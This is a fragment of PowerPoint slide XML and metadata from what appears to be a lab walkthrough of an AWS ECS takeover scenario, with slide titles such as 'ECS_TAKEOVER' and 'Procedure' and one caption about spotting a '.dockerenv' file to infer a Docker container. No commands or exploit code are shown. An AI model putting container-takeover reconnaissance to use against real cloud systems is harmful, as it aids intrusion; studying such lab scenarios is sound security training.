          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="그림 17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B50A9131-434E-8902-BF3F-33A5619047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45"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2527105" y="4562924"/>
            <a:ext cx="6431837" cy="1373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9A617A-DF17-7EA9-1E4A-2A8F76F5528D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="339294" y="6102862"/>
            <a:ext cx="1012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Listing out the files inside the root we could find ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>dockerenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>’ and assume that we are in a docker environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306381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666</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>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함초롬바탕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>ECS_TAKEOVER</vt:lpstr>
      <vt:lpstr>Scenario Goal &amp; Summary</vt:lpstr>
      <vt:lpstr>Procedure</vt:lpstr>
      <vt:lpstr>AWS_Profile_Configure &amp; Deploy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ecs_takeover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NTFS 파일 시스템 구조</dc:title>
  <dc:creator>Jaehyun Chung</dc:creator>
  <cp:lastModifiedBy>Jaehyun Chung</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-21T04:15:55Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-20T14:41:57Z</dcterms:modified>
</cp:coreProperties>
</file>